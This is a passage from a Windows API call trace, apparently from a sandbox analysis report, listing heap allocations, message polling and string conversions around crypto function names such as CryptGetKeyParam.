wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0099.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0099.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0099.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0099.058] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0099.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0099.058] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0099.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0099.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbbf4) returned 0x4516010 [0099.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0099.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0099.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0099.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0099.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbbf4) returned 0x452d810 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0099.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0099.060] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0099.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0099.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0099.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0099.061] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0099.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0099.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0099.061] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0099.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0099.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0099.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0099.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0099.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0099.062] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0099.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0099.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0099.063] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0099.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0099.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0099.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0099.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0099.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0099.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0099.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0099.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0099.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0099.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0099.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0099.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0099.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0099.064] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0099.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0099.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0099.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0099.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0099.064] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0099.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0099.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0099.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0099.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0099.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0099.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0099.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0099.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0099.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0099.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0099.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0099.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0099.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0099.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0099.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0099.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0099.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0099.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0099.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0099.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0099.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0099.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0099.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0099.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.069] HeapFree 